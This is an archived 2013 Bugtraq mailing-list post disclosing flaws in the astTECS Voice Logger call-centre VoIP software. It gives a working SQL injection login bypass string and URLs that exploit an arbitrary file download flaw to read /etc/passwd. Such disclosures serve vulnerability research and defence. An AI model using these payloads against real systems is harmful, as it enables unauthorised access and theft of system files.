[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Voice Logger astTECS - bypass login & arbitrary file download

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Voice Logger astTECS - bypass login & arbitrary file download
From: Michał Błaszczak <blaszczakm@xxxxxxxxx>
Date: Tue, 16 Jul 2013 11:01:05 +0200

Author: Michal Blaszczak
Website: http://blaszczakm.blogspot.com
Project: hack voip - http://blaszczakm.blogspot.com/search/label/hack%20voip
Date: 16.07.2013

Voice Logger  - VoIP software for Call Center

1) bypass login
login: admin' or 1='1
password: admin

line: 168 file: manager_login.server.php

2) arbitrary file download

http://192.168.15.145/poligon/asttecs/records1.php?file=/etc/passwd
linie: 2 file:records.php

http://192.168.15.145/poligon/asttecs/records.php?file=/etc/passwd
linie: 2 file:records.php


3) and other security bugs


Michał Błaszczak
http://blaszczakm.blogspot.com

Prev by Date: [CVE-2013-4763|CVE-2013-4764] Vulnerability in built-in system app of Samsung Galaxy S3/S4
Next by Date: [security bulletin] HPSBMU02870 SSRT101012 rev.2 - HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access
Previous by thread: [CVE-2013-4763|CVE-2013-4764] Vulnerability in built-in system app of Samsung Galaxy S3/S4
Next by thread: [security bulletin] HPSBMU02870 SSRT101012 rev.2 - HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access
Index(es):
- Date
- Thread